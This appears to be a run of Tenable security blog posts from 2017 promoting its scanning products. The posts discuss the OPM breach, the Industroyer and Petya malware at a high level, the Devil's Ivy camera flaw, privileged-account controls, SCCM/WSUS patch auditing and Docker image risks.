As container images are uploaded into Tenable.io Container Security, they are automatically scanned for vulnerabilities and malware. Once a vulnerability is identified, the product automatically rescans all stored container images against the new vulnerability, thus ensuring continuous protection.

For DevOps teams, Tenable.io Container Security provides integrations with common build systems such as Jenkins, Bamboo, Shippable, Travis CI and others, as well as with other continuous integration/continuous deployment tools used by software developers. This enables you to push images from your private registry into Tenable.io Container Security.

Learn more

Tenable is the only vulnerability management provider to offer integrated container security with Tenable.io Container Security.

Tenable.io Container Security integrates continuous integration and continuous deployment (CI/CD) systems to support and strength DevOps practices, as well as enterprise policy compliance.

Want to know more about Tenable.io Container Security?

• Read more about Tenable.io Container Security
• Try Tenable.io Container Security free for 60 days

Socrates is alleged to have said, “the secret of change is to focus all of your energy, not on fighting the old, but on building the new.”¹ The saying certainly applies to cybersecurity, where change is the only constant. You don’t have to be Socrates to see that two years after the Office of Public Management cyberattack, too many organizations are still focusing on the old and not building the new.

The good news here is that it’s not too late. There are some best practices that all organizations can employ to strive for operational excellence, to better understand and reduce their exposure and risk, and to implement a resilient, long-term cybersecurity strategy.

1. Manage risk proactively

When the OPM breach was discovered in 2015, they also found 15,000 outdated machines and 2,000 pieces of malware unrelated to the data breach. Fewer than 10 infections from the breach’s PlugX malware compromised millions of records. The agency was thrown into reacting to, not anticipating a major incident.

Knowing your network is the foundation of good cybersecurity

Knowing your network is the foundation of good cybersecurity and your best defense against increasingly sophisticated cyberattacks. Having a resilient and comprehensive cybersecurity posture must start with a strong understanding of your organization’s network, nodes, assets, tools and vulnerabilities, accompanied by a robust patch management program to address known but unpatched vulnerabilities.

The insider threat also cannot be ignored. Insiders with legitimate access privileges often can fly under the security radar so that breaches are discovered only long after the fact. There are blind spots in every organization’s network that leave them vulnerable, including employee data which carries immense value to attackers. That’s why it’s important to treat all data—especially on government networks—as carefully as you would classified information, and implement effective access, password and credential management to defend against elevated privileges, unauthorized access and insider threats. You can never truly know where the next threat will come from.

2. Embrace modernization

Organizations cannot make large, impactful changes if they are averse to change in the first place, and this is true in IT security as in other areas of operation.

Security upgrades must go hand in hand with IT modernization

Security upgrades must go hand in hand with IT modernization. As organizations deploy up-to-date IT, they have the perfect opportunity to reduce their attack surface and address rapid changes in the threat landscape. They can enhance security through improved visibility into the network, continuous and comprehensive monitoring, and the patching of vulnerabilities. Legacy systems that are no longer supported with regular patches can be protected by isolating them from the internet-connected network until they can be replaced.

However, at some point, government agencies will run out of resources to maintain these outdated systems, and will need to prioritize change. One way to hold these organizations accountable to high security standards is to implement a baseline approach that outlines which models of operating systems can still be supported across the federal government. And then follow through with cyber funding to improve networks.

Legislation, such as the Modernizing Government Technology (MGT) bill now pending in the Senate, would establish a working capital fund to let agencies pay for technology updates through savings realized from modernization. Replacing the traditional use-it or lose-it approach of annual appropriations would allow agencies to make long-term plans for replacing legacy IT, taking advantage of advances in technology while simultaneously strengthening cybersecurity.

3. Leverage cybersecurity frameworks

Too often, organizations reinvent the wheel when it comes to cybersecurity. This is particularly the case from a governance or process perspective. Yet there is a large volume of cybersecurity research available that has identified many cybersecurity best practices.

The government has produced several cybersecurity frameworks to help agencies and other organizations secure IT systems and sensitive data. Many of these are voluntary for the private sector, but under FISMA (Federal Information Security Modernization Act) and other cybersecurity initiatives, federal agencies are being required to use this guidance. The NIST Cybersecurity Framework is now recommended by the recent Presidential Executive Order on Cybersecurity as a starting point on long-term foundational cybersecurity insights.

4. Invest in a strong workforce

Finally, regardless of the threats facing all organizations, it takes well-trained, well-informed people with creative mindsets to stop the threats. In government, as in other sectors such as oil, gas and utilities, many of the best-trained workers are nearing retirement. This brain drain will make combatting threats even more difficult.

By September 2017, 31 percent of the federal workforce will be eligible to retire

A GAO study found that by September 2017, nearly 600,000 federal workers—31 percent of the workforce—will be eligible to retire. Government agencies will find it difficult to compete with the private sector to counter the exodus. Government salaries usually are not competitive with commercial firms, and private sector jobs often offer more flexibility and creative benefits.

Organizations will have to provide incentives outside of financial compensation for security professionals to enter and remain in the cybersecurity workforce. Benefits such as flexible working conditions, professional development, and public service opportunities should be offered to a younger workforce that values such creative benefit packages.

More information

Build a solid foundation for a long-term cybersecurity strategy

Effective cybersecurity requires that organizations learn from the OPM breach and build a solid foundation for a long-term cybersecurity strategy. By focusing first on basic practices, organizations can make strides in understanding their exposure, reducing risk and building a resilient cybersecurity program.

For more details on these best practices, download our free OPM whitepaper.

¹ The quote is attributed to a character named Socrates in Dan Millman’s book Way of the Peaceful Warrior.

Recently, a new threat dubbed Industroyer or CrashOverride was identified as the malware that was used in the 2016 attack on the Ukraine electric grid. Many pros are calling Industroyer the biggest threat to hit industrial control systems (ICS) since Stuxnet. However, Industroyer’s significance as a single event is relatively small because there are no zero days in the Industroyer payload.

Malware like Industroyer is the new normal

Security for critical infrastructure is a matter of national security and unfortunately, malware like Industroyer is the new normal. Multiple smaller attacks could easily add up to a disruptive event. Instead of reacting to every new malware threat, administrators should take a long-term strategic approach to this new environment.

Complying with a good security framework is one of the most effective security strategies you can adopt instead of just reacting to newsworthy vulnerabilities

ICS/SCADA systems often cannot be scanned or patched due to uptime requirements or simply because legacy systems have no means of being updated. So, when Industroyer was announced, the North American Electric Reliability Corporation (NERC) issued an alert to their members to be vigilant and to protect their networks with tighter access controls. They recommend their NERC Critical Infrastructure Protection Standards as best practice requirements for utilities to secure their assets. Complying with a good security framework takes time, but it is one of the most effective security strategies you can adopt instead of just reacting to newsworthy vulnerabilities.

How Industroyer works

Industroyer employs a modular design, and can be broken down into four basic components:

• Backdoor - sets up a command and control channel over https once the system is infected
• Launcher - launches one or more payloads
• Four payloads - one payload for each SCADA protocol that Industroyer supports:
  • IEC 60870-5-104
  • IEC 60870-5-101
  • IEC 61850
  • OLE for Process Control Data Access (OPC)
• Data wiper - a component that wipes itself from the system

There is an additional backdoor which could be installed to maintain persistent control over the system by replacing a legitimate version of Notepad with a trojanized version of Notepad.

The malware authors also released a tool which performs a DoS attack against the Siemens SIPROTEC family of protection relays.

Tenable solutions that detect SCADA protocols

Tenable offers several solutions to detect the the ICS/SCADA protocols targeted by Industroyer and other malware.

Nessus

YARA signatures are available to detect one or more of the Industroyer/CrashOverride payload components. Tenable customers can use YARA rules to identify infected systems with the Malicious File Detection Using Yara Nessus® plugin.

You’ll find sample rules that can be used with Nessus to detect the IOCs on GitHub.

Nessus Network Monitor

Nessus® Network Monitor (formerly PVS™) has released signatures to detect a DoS attack on the Siemens SIPROTEC family of protection relays (SIPROTEC DoS, CSA-15-202-01/ CVE-2015-5374): PRM #700132, Siemens SIPROTEC DoS (SCADA).

Using SecurityCenter dashboards for strategic protection

Using the Nessus vulnerability scanner and Nessus Network Monitor, SecurityCenter Continuous View® (CV) has the ability to correlate collected data and provide insight into the discovered risks. SecurityCenter® can help administrators focus in on a new critical vulnerability (such as Industroyer/CrashOverride) when it is detected in their networks. But ICS/SCADA systems require more than a periodic scan for the latest vulnerability; a complete discovery inventory, passive and active monitoring, and credentialed scans should be included as best practices. In the NERC Critical Infrastructure Protection Standards, the first strategic steps are to inventory the systems on the network, and ensure all protocols in use on the networks are properly identified. The CIP-002 BES Cyber System Categorization dashboard assists with host discovery and vulnerability identification, helping you get a broader picture of your network security.

CIP-002 requires organizations to identify and categorize Bulk Electric System (BES) Cyber Systems to support appropriate protection against compromises that could lead to misoperation or instability in the BES. You can meet this requirement by building and maintaining an accurate inventory of devices so that any attack or infection can be effectively detected and isolated. Additionally, once you know what devices are part of your NERC environment, you will be prepared to address CIP-007 R1 by monitoring network traffic to detect ports or services that should not be in use.

CIP-007 R1 requires organizations to protect against the use of unnecessary physical input/output ports used for network connectivity, console commands, or removable media. If unauthorized traffic is detected, the accurate inventory you built will be key in identifying and addressing the devices involved. The CIP-007 R1 Ports and Services dashboard provides thorough insight into the network activity in your organization by monitoring open ports and active services. The dashboard also identifies the usage SCADA-specific protocols as well as protocols from SCADA vendors. Since targeted malware, like Industroyer/CrashOverride, can exploit SCADA protocols to compromise BES systems, understanding the expected and acceptable traffic within your NERC environment is essential. The network activity detections are performed by the Tenable Nessus Network Monitor, and other network traffic collected by the Tenable Log Correlation Engine® (LCE®) are normalized and correlated to identify traffic patterns and anomalies. Active scan data from SecurityCenter is used in this dashboard to detect vulnerable ports and exploitable services. All of the data helps you resolve misused or misconfigured ports and services to protect your network against malicious activity.

There are six other dashboards related to CIP available in the SecurityCenter Feed:

• CIP-004 R4/R5 Access Management, Revocation, and Control
• CIP-005 Electronic Security Perimeter
• CIP-007 R3 Malicious Code Prevention
• CIP-010 R1/R2 Configuration Change Management and Monitoring
• CIP-010 R3 Vulnerability Assessment and Patch Management
• CIP-010 R4 Transient Cyber Assets and Removable Media

These dashboards can help you monitor a variety of other network security concerns, such as access control and change management. Other dashboards monitor for vulnerabilities and malware in your NERC environment. You can also track transient devices and monitor your network perimeter with CIP dashboards, giving you a complete view of network access and usage. This set of dashboards leverages active and agent scan data gathered by Nessus, along with passive network detections by the Nessus Network Monitor and correlated event data from LCE. Armed with all of this information about your NERC environment, you will be prepared to remediate issues and maintain CIP compliance. Determining whether your environment is vulnerable to malware in the news that day is important, but a strategic and thorough approach aided by SecurityCenter CV prepares you to ensure the security of your network when the hype fades.

Wrap-up

The key to managing a great security program is being strategic rather than tactical

Don’t fall into the trap of chasing down the latest headline-making vulnerability on your SCADA systems. A unified platform like SecurityCenter provides a more strategic approach to securing industrial systems and critical infrastructure with active and passive monitoring of your systems. If your AV systems, patching programs, and signatures are kept up to date on a regular basis; if you run credentialed scans for misconfigurations; if you implement protocols to assure that only the appropriate devices are communicating with each other; if you audit CIP compliance, then the next malware crisis will not be a major threat to your environment. The key to managing a great security program is being strategic rather than tactical.

Many thanks to Megan Daudelin, Ian Parker and John Chirhart for their contributions to this blog.

A new version of the Petya malware is spreading globally, including the European Union, Ukraine and Russia. It has already impacted many organizations, both large and small, and has compromised systems at Ukraine’s central bank, its state telecommunications company, municipal metro, and Kiev’s Boryspil International Airport.

Background

Petya ransomware is powered by Shadow Brokers exploits, which were leaked earlier this year. After compromising a system, the malware encrypts the data using a private key, and prevents users from accessing the system until it is restored or decrypted. The initial infection vector for this campaign appears to be a poisoned update for the MeDoc software suite, a tax software package used by many Ukrainian organizations. The malware then infects systems that are vulnerable to MS17-010 and spreads laterally across the infrastructure.

Note: The Petya malware creates a scheduled task which reboots up to one hour after infection. If the task is removed before execution, it does not reschedule, buying you some time.

Similar to the WannaCry ransomware that infected systems globally earlier this year, Petya takes advantage of known vulnerabilities that already have patches. In a world where malware threats arise every day, chasing daily threats is not advised. Organizations everywhere and of every size need a more strategic approach to proactively manage security threats (and protect themselves and their customers) by implementing good cyber hygiene practices, including regular patching, updates, backups, and continuous monitoring.

How Tenable can help

Patch vulnerabilities

Tenable customers should immediately patch systems vulnerable to MS17-010 if you haven’t already done so. Tenable.io™ Vulnerability Management has the following four plugins, released earlier this year, to detect vulnerable systems:

Malware scan

Tenable customers can use the Malware Scan Policy in Tenable.io™ or SecurityCenter™ to detect machines infected with Petya, and the results will be reported under plugin 59275:

YARA detection

Tenable customers can also use YARA rules to identify infected systems through the Malicious File Detection Using YARA Nessus plugin.

Here’s a sample rule from Kaspersky which can be used with Nessus to detect the Petya malware :

Dashboards

The Petya dashboard uses all the available methods mentioned above to consolidate the data for easy understanding of the systems most likely affected or at risk from the malware. The components bring in netstats from Nessus and the Nessus Network Monitor, and also display the content related to missing patches associated with SMB vulnerabilities.

Wrap-up

Most ransomware exploits well-known vulnerabilities that already have patches available. Implementing a proactive security program that includes regular patching and system updating is one of the best strategies you can use to prevent malware from infecting your systems. Make it a regular habit to patch and protect.

For more information

• Learn more about Tenable.io, the first vulnerability management platform for all modern assets
• Get a free 60-day trial of Tenable.io

Many thanks to the Tenable research team for their contributions to this blog.

Updated June 28, 2017. Initial research suggested that CVE-2017-0199 was a potential infection vector; we are doing additional research into that issue.

As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

Use Tenable.io to quickly address systems that are at risk

Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

Malware scanning

Tenable.io includes a customizable malware scan template where you can incorporate both good and bad known MD5 hashes, along with a hosts file whitelist. On Windows systems, hosts files contain commented lines of text that consist of two localhost address entries. Most systems will query local DNS servers to resolve domain names to IP addresses. Some organizations will add entries into hosts files for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system will use the entries within the hosts file first and bypass records within your DNS server.

Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.

Enabling the File System Scanning option enables you to scan specific directories within your Windows environment such as the C:\Windows, C:\Program Files, and User Profile directories that are frequently used to install malware. You can also scan malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.

The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution

The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.

Vulnerabilities

The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware just to name a few.

Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

Tenable.io uses both active and passive methods to detect malicious content

Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into website due to a cross-site scripting (XSS) or SQL injection vulnerability.

Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.

No organization is immune from vulnerabilities and attacks

No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

Start with Tenable.io

To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.

What did the Sony and Anthem breaches have in common with an estimated 60-80% of all breaches? They all involve the use of compromised privileged (administrative) accounts.

Attackers using administrative credentials can move laterally across your network to conduct internal reconnaissance, maintain a presence, and ultimately accomplish their missions. Last year, The Forrester Wave™: Privileged Identity Management, Q3 2016 estimated that 80% of security breaches involve privileged credentials. It stated, “Privileged credentials provide greater scope for stealing data en masse than individual accounts do: With privileged credentials, attackers can dump the entire database, bypass network traffic limitation, delete logs to hide their activity, and exfiltrate data easier.”

The Cybersecurity Frameworks and Foundational Security Controls survey, sponsored by Tenable and the Center for Internet Security, uncovered a significant gap between organizations’ policies to control use of administrative privileges and the implementation of controls needed to enforce those policies. For example, 67% of respondents said they have implemented policies to change all default passwords for applications, operating systems, routers, firewalls, wireless access points and other systems. However, fewer than 45% have implemented automated or even manual controls to enforce their policies.

Let that sink in. One third of organizations do not have policies to change default administrative passwords. And that even when policies exist, they are not widely enforced. Clearly, many organizations need to up their game.

Human nature being what it is, we are prone to take shortcuts and share administrative credentials across systems and across multiple administrators, as well as grant administrative privileges to users so they can install software themselves without troubling IT.

True story: I once worked with a small company that used the same shared administrative credentials across all of their enterprise applications. To make matters worse, the credentials were written down and kept on the lead administrator’s desk. If a disgruntled insider or an outside attacker got hold of credentials, he could anonymously access everything. Perhaps this is why the Center for Internet Security included “Controlled Use of Administrative Privileges” in the top five Foundational Cyber Hygiene Controls.

Tenable can help

SecurityCenter Continuous View^® includes multiple reports, dashboards and Assurance Report Cards^® that can help you monitor and evaluate the use of administrative privileges. For example, the CIS CSC Account Monitoring and Control dashboard is quite useful.

Two components in the lower left of the dashboard are especially useful:

The CSF - Account and Credential Vulnerabilities component displays warning indicators for vulnerabilities related to accounts and credentials. A purple indicator means that one or more vulnerabilities contain the specified keyword. You can drill in to investigate the specifics. I clicked on the Account indicator and discovered that one of my hosts had a guest account with excessive privileges. When I looked at the details, I was informed by plugin 10907 that “Using the supplied credentials, Nessus was able to determine that the 'Guest' user belongs to groups other than 'Guests' (RID 546) or 'Domain Guests' (RID 514). Guest users should not have any additional privileges.

The CSF - User Access and Least Privilege Compliance Checks component displays results of compliance checks pertaining to areas such as password requirements, lockout policy after failed logins, and controlled use of administrative privileges. You can click on a highlighted indicator in the Host with Fails column to investigate the systems with failed audit checks.

Learn more

Tenable is hosting a webinar on July 12th where we will dive into the CIS control details and show you how Tenable can help. This webinar is the last of a five-part series that explores each of the CIS Foundational Cyber Hygiene controls. Brian Ventura, a SANS community instructor, will be our expert guest presenter. Brian teaches a 2-day course, Critical Security Controls: Planning, Implementing and Auditing. He has also taught a 5-day course, Implementing and Auditing the Critical Security Controls – in Depth. A CyberArk representative will show you how they can help you manage privileged credentials. We will also reserve time for questions and answers.

Please register even if you can’t attend so we can send you a link to the recorded webinar to view at your convenience.

Over the past several years, Tenable has discussed the growing concerns around Internet of Things (IoT) security. With the static nature of IoT devices such as cameras, door sensors, and many more, the ability to correct flaws in third-party libraries becomes increasingly difficult. Yesterday, the researchers at Senrio discovered a serious flaw in the gSOAP library found in many IoT devices, such as the AXIS M3004. Tenable.io and SecurityCenter use active and passive detection methods to identify these vulnerable systems by enumerating the operating systems and detecting versions of vulnerable third-party libraries.

Many manufacturers recommend customers or installers use segmentation strategies when deploying IoT devices to address potential security vulnerabilities. While segmentation is a good plan when deployed correctly, often the installer and IT organizations do not fully test access control methods. For example, the IoT device might be placed in separate Virtual Local Area Networks (VLAN), but the Access Control Lists (ACL) are not fully implemented and tested. I often ran into these issues when performing security assessments and pen-tests. I would go into a network as a normal user and use Nessus to discover all of the live devices on the network. After stumbling onto Industrial Controls Systems (ICS), IP phones, and other devices that are not heavily monitored, I would then clone a MAC address or use some other method to change VLANs and begin to attack the network as if I were an IP Camera. If ACLs were properly implemented, I would quickly find I had no access, but that was seldom the case. Instead, I often found I had more access from the “Segmented VLAN”. This example illustrates why the Devil’s Ivy vulnerability is so dangerous.

Vulnerability Detection

The vulnerability discovered within the gSOAP library is a classic buffer overflow, which allows the attacker to execute arbitrary code. Tenable’s research team developed a new Nessus plugin to detect the affected devices by extracting the banners from services such as FTP and SNMP. The Nessus Network Monitor uses plugins to detect AXIS using FTP and SMTP traffic traversing the network.

• AXIS Camera Detection via FTP (9681)
• AXIS Camera Detection via SNMP (9683)

Tenable.io Vulnerability Management and Nessus will use Plugin 101810 “AXIS Camera gSOAP Message Handling RCE (ACV-116267) (Devil's Ivy)” to identify the vulnerable AXIS systems. The plugin relies banners from FTP and SNMP services running on the Axis cameras. In certain cases the plugin can also extract the version based by querying ‘param.cgi’ file device on the system. Tenable.io Container Security also detects vulnerable third-party libraries, such as gSOAP, embedded within containerized application workloads.

IoT & AXIS Dashboard

The IoT Device Summary dashboard, available via the SecurityCenter Feed, leverages data from the Tenable sensors to offer insight into IoT-related activity on your network. By adding a subnet, IP address, or asset filter to the components in this dashboard, you can tailor the results to focus on your IoT devices. The dashboard allows you to track IoT device network connections as well as detect IoT cameras by ONVIF-compliant vendor.

Attack Vector

Do not underestimate the seriousness of this vulnerability.

Physical security companies that install and rely on these vulnerable cameras are at potential risk. If the installers fail to apply this patch or fail to secure the VLANs, cyber criminals can use the camera systems to assist in physical compromises. Once the camera systems are compromised, adversaries can reset all of the cameras or load their own version of the operating system. At that point, they have full control over the cameras, which can have serious consequences, including disabling the camera or deleting any captured evidence.

Wrap-Up

Many vulnerabilities can cause a loss to business processes or cause employees to recreate data; however, this vulnerability is the type that often gets easily (mistakenly) dismissed. Vendors often say, “We have a firewall,” and ignore the risks. Devil’s Ivy will be with us for some time as IoT systems are not easily patched.

To prevent this vulnerability from causing damage or revenue loss, Tenable recommends you properly segment your IoT networks using tightly controlled ACLs and to quickly deploy any patches related to Devil’s Ivy vulnerabilities.

For more information

• Learn more about Tenable.io, the first cloud-based vulnerability management platform built for today’s modern assets
• Start a free 60-day trial of Tenable.io

Many thanks to the Tenable research team for their contributions to this blog

We receive many questions from customers on how to configure scans to audit their patch management solutions. Whether you have a few hundred or several thousand systems, patch management solutions provide one of the easiest ways to maintain integrity and stability of systems within your network. Unfortunately, no matter what type of solution you are using, or how often you are patching your systems, patches can still fail for a variety of reasons. Issues such as managed clients failing to synchronize, systems offline during a patch cycle, group policy issues and other misconfigurations can leave your systems at risk. Using Tenable.io patch management integrations provides you with an effective way to compare vulnerability results and monitor patch management efforts across the enterprise.

Many organizations use Microsoft’s Windows Server Update Service (WSUS) and System Center Configuration Manager (SCCM) to manage and deploy patches. WSUS is Microsoft’s built-in patch management service that enables organizations to automatically patch vulnerabilities on Windows systems. Organizations often use SCCM to deploy software, monitor systems, and manage devices within the enterprise. SCCM integrates with WSUS by providing more control over scheduling and deployment of patches.

Creating Scans

To audit your patch management solution using Tenable.io, start by selecting the Advanced Scan template. Under the Credentials tab, click on Patch Management, then select the desired Patch Management solution. Enter  the IP address of your server along with an administrative account that has access to the patch management server.

Tenable.io only requires patch management credentials to be entered into your scan, so you don’t need to add local credentials for your managed hosts. This option is useful for larger organizations where credentials for managed hosts may not be available. Vulnerability data is collected from the selected patch management solution, and will return a list of outstanding patches that you need to install.

To get a complete look at your patch management solution, we recommend adding credentials for your managed hosts. Nessus will scan each individual host and compare the information being reported by your patch management solution. 

Whether you are auditing your WSUS or SCCM server, there are several plugins that need to be enabled within your scan in order to see results. In addition, you will also need to enable the Windows : Microsoft Bulletins Plugin family.

Required SCCM Plugins

• Patch Management: SCCM Server Settings (Plugin ID 57029)
• Patch Management: Missing updates from SCCM (Plugin ID 57030)
• Patch Management: SCCM Computer Info Initialization (Plugin ID 73636)
• Patch Management: SCCM Report (Plugin ID 58186)
• Windows : Microsoft Bulletins Plugin family

Required WSUS Plugins

• Patch Management: WSUS Server Settings (Plugin ID 57031)
• Patch Management: Missing updates from WSUS (Plugin ID 57032)
• Patch Management: WSUS Report (Plugin ID 58133)
• Windows : Microsoft Bulletins Plugin family

If you have added credentials for your managed hosts into your scan, using the Patch Management Windows Auditing Conflicts plugin will help you quickly detect any patch conflicts being reported. The Patch Report plugin will report on vulnerabilities from third-party software that may not be covered by your existing patch management solution. Enabling the optional plugins will provide valuable information on client versions deployed within your network.

Recommended Plugins

• Patch Management Windows Auditing Conflicts (Plugin ID 64294)
• Patch Management Auditing Satisfied (Plugin ID 64295)
• Patch Report (Plugin ID 66334)

Optional Plugins

• Microsoft SMS/SCCM Installed (Plugin ID 62028)
• Microsoft System Center Configuration Manager Client Installed Plugin ID (55532)
• Microsoft Windows SMB : WSUS Client Configured (Plugin ID 50859)
• Windows Server Update Services (WSUS) Detection (Plugin ID 20377)

Once you have selected the appropriate plugins, your output should look similar to the screenshot below.

Results

The patch management feature within Tenable.io enables you to collect information on missing patches reported by patch management solutions. Scan results will include a summary of Windows Bulletins collected from your patch management solution.

Vulnerabilities detected by your patch management solution includes a report on the affected hosts and whether the system is vulnerable. Using this information will help to ensure that your patch management software is configured properly and providing accurate information.

Results from the Patch Management: SCCM Report (Plugin ID 58186) and the Patch Management: WSUS Report (Plugin ID 58133) plugins will include a report on the status of managed agents, last sync timestamps, patch failures reported and any hosts that are up to date. This information will help you detect potential communication issues between the client and server, as well as any systems that may have fallen out of scope.

Conflicts

Using credentialed scans along with the Patch Management Windows Auditing Conflicts (Plugin ID 64294) plugin will report on any conflicts between Nessus and your patch management solution. If any conflicts are discovered, the plugin will use a “High” severity rating, and include a summary of the Microsoft Bulletins found.

Nessus uses the credentials provided within your scan to login to each managed host and compare the current patch level status. These results are compared to patch levels collected from SCCM by Nessus as indicated by “SCCM conflicts.”

The report for each patch and the discrepancies are displayed in the plugin output. Conflicts like this may indicate that the host was not targeted for deployment of a particular patch, so the SCCM server does not detect it as  missing. 

The below example shows that SCCM is reporting the MS15-037 patch missing, however Nessus is reporting the system as not vulnerable. In this instance, SCCM may be reporting outdated or inaccurate data that should be addressed immediately by your security team.

Using this data helps to underscore the importance of cross-referencing patches between what is on the system and what the patch management system thinks is on the system.

Wrap-Up

Using patch management integrations within Tenable.io helps you monitor patch cycles, improve remediation efforts, and strengthen your overall security posture. Start with your free 60-day trial of Tenable.io Vulnerability Management.

More Questions?

• Check out the Tenable.io for Microsoft SCCM How-To Guide.
• Continue the patch management conversation in the Tenable Community.

Community ecosystems with vibrant member support have been the catalyst for faster innovation and shorter software development lifecycles in DevOps. Whether it is downloading code or contributing back to the community, organizations today rely heavily on open source software to drive their business. In fact, modern application development is more about assembling existing packages than writing new code. Developing new code takes time, and in the high-velocity world of DevOps it’s much easier and faster to download open source software and frameworks to get up and running quickly. As the adage goes, it’s better to “stand on the shoulders of giants” than to “reinvent the wheel.”

But this adds tremendous security blind spots if security pros are not working closely with their DevOps counterparts. According to a study conducted by Sonatype, 20 percent of organizations suspected or confirmed breaches related to open source components, which was a 50 percent increase since 2014. In addition, a staggering 50 percent of organizations are not satisfied with their ability to understand known security vulnerabilities in open-source components. Security needs to be embedded early in the software development lifecycle (SDLC) in a non-intrusive way that avoids slowing down developers. Organizations should start thinking of security as another critical test in the build phase.

So how does this relate to application containers?

Containers are the hottest topic in the world of DevOps infrastructure. A container is a self-contained package that has everything required to run an application: libraries, binaries, configuration files and just enough operating system to make it lightweight. Containers allow developers to rapidly progress from build to test to production without any changes to the application across the SDLC. If you haven’t heard of containers before, you probably have heard of Docker, the most popular container image format. 451 Research estimates that 25 percent of enterprises are already using containers today, and Docker adoption is up 40 percent since last year.

Not only have containers become an essential enabling technology for modern application development, but the technology itself relies on open source software for distribution among DevOps teams to build solutions. The most common container distribution today is through Docker Hub, a cloud-based container registry for pre-built, third-party container images. Docker Hub has tremendous community support with over 500,000 Docker container images that have been downloaded over 8 billion times. This community is so pervasive that customers often believe they are building all of their container images in-house when, in reality, the base layers are coming from Docker Hub. With so many developers relying on open source to build containers, how has that affected their organization’s security posture? What is the security exposure caused by downloading Docker Community images and Docker Official images? What can you do to mitigate this risk and secure containers before deployment?

Join me at Black Hat to find out!

On Wednesday, July 26 at 10:20 a.m. PT, I’ll be unveiling new, groundbreaking research analyzing the top 5,000 Docker Community images and all Docker Official images in Docker Hub for vulnerabilities and malware. The research team used Tenable.io Container Security to conduct the analysis, and the results are extremely surprising. The bottom-line is that known vulnerabilities are widespread on Docker Hub. All container registries, images and hosts need to be tested continuously and automatically to eliminate blind spots and reduce exposure risk.

If you’re attending Black Hat, I hope you will join me in the Business Hall Theater A on Level 1 on Wednesday. If you’re looking to seamlessly and securely enable DevOps processes by providing visibility into the security of container images, we invite you to try Tenable.io Container Security for a 60-day free trial.

The stakes have never been higher when it comes to cybersecurity. Global cyber attacks such as the recent WannaCry ransomware attack is a sobering reminder that cybersecurity is the existential threat of this generation. A new report from Lloyd’s of London estimates a serious cyber attack could cost the global economy more than $120 billion - as much as catastrophic natural disasters such as Hurricane Katrina and Sandy. According to the report, the most likely scenario is a malicious hack that would take down a cloud service provider at an estimated loss of $53 billion. With all of the attention and the hundreds of vendors in the security industry, why are we still here in this same situation, with it only getting worse and more severe?

The reality is these "future" technologies and compute platforms, such as IoT and cloud, are no longer the future. They are here and now. This means the cyber attack surface is no longer a laptop or a server in a data center. According to Business Intelligence, there will be nine billion active IoT devices in the enterprise by 2019. That’s more than the entire smartphone and tablet markets combined. According to a 2016 IDG Enterprise Cloud Computing Survey, 70 percent of organizations already have apps in the cloud and 16 percent will in 12 months. We’re also seeing development shifts such as DevOps become mainstream, and with that comes the rise of containers and microservices as a way to make changes to smaller parts of the application in a more agile way. According to 451 Research, the container market is the fastest growing market of cloud-enabling technologies, with a CAGR of 40 percent through 2020, growing from $762 million to $2.7 billion by 2020.

So What Do We Do in Response?

We throw hundreds of tools at the problem, each designed to protect the organization from a nice, many times advanced "threat of the week" style attack. We have Configuration Management Databases (CMDBs) which give the organization an IT view of assets and configurations, but weren’t built to keep pace with modern assets and aren’t a security view. Vulnerability Management (VM) technologies are used by most organizations to scan the network to identify issues, but the problem with legacy VM tools is they are a "one size fits all" approach designed in the world of client/server and on-premise data centers which only assess "known" assets which are running at the time of the scan or that can have an agent deployed on them.

